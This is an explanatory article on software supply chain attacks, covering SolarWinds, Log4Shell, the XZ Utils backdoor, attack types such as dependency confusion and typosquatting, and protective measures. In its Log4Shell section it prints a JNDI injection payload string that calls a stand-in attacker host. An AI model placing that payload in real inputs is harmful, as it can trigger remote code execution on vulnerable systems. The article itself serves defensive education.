Supply Chain Attack
Attack on the software supply chain: Instead of attacking the target company directly, attackers compromise a supplier, service provider, or shared software library. An infected update then infects thousands of customers at once.
In a supply chain attack, attackers compromise a supplier in order to gain access to that supplier’s customers. Because trusted updates and software packages serve as the delivery mechanism, this type of attack is particularly dangerous—traditional security controls fail because the malware comes from a trusted source.
The Most Notable Supply Chain Attacks
SolarWinds (2020)
The most serious supply chain incident in history. APT29 (Cozy Bear, Russian SVR) infected the update system of SolarWinds Orion—network monitoring software used by 33,000 companies, including U.S. government agencies (NSA, DHS, Treasury, Justice).
Timeline:
- Attackers compromised SolarWinds’ build infrastructure months in advance
- Malicious code was inserted into the Orion build (SUNBURST)
- Updates were signed and distributed—appearing legitimate
- 18,000 companies installed the infected update
- Backdoor lies dormant for 14 days and then begins C2 communication
- Attackers select high-value targets and deepen their access
Detected: First by FireEye (now Mandiant) – and only because attackers were testing MFA bypass tools.
Log4Shell (CVE-2021-44228, 2021)
Log4j is a Java logging library used in millions of products. A single-line input was sufficient for remote code execution:
${jndi:ldap://attacker.com/malware}In this string within any log output (user agent, URL parameter, etc.) → Log4j loads LDAP response → Code is executed.
Affected: Apple iCloud, Twitter, Amazon AWS, Minecraft, Cisco, VMware, Juniper—practically every enterprise product using Java.
XZ Utils Backdoor (2024)
Three-year social engineering campaign: Attacker "JiaT75" spent months building trust within the open-source community, became a maintainer of XZ Utils (Linux compression tools), then built in a backdoor that would have compromised SSH authentication in systemd-based systems.
Discovered: Only by chance (Andres’ friend noticed unusual CPU usage).
Attack Types
Dependency Confusion
Attacker uploads a package with an internal name (e.g., company-internal-lib) to a public npm/PyPI repository with a higher version number → Package manager loads the public version instead of the internal one.
Typosquatting
requests (legitimate) vs. reqeusts (typo) - Attacker registers similar package names.
Compromised Maintainer Account
Maintainer account of a popular package taken over → malicious update published.
Build System Compromise
Like SolarWinds: The build infrastructure itself is infected → legitimate signature on infected code.
Protective Measures
For Software Users:
- Software Composition Analysis (SCA): Detect known CVEs in dependencies
- Dependency Lock Files (package-lock.json, requirements.txt) - lock down exact versions
- Subresource Integrity for browser assets
- Update testing in an isolated environment before production rollout
- Vendor Risk Management: Evaluate suppliers’ security practices
For software developers:
- Secure the build infrastructure (2FA, code signing, SLSA framework)
- Create and maintain a Software Bill of Materials (SBOM)
- Reproducible builds: Make the build process deterministic and verifiable
- Dependency scanning in the CI/CD pipeline
Compliance: NIS2 Art. 21 (d): Supply chain security explicitly mandated as a mandatory measure for critical infrastructure operators.
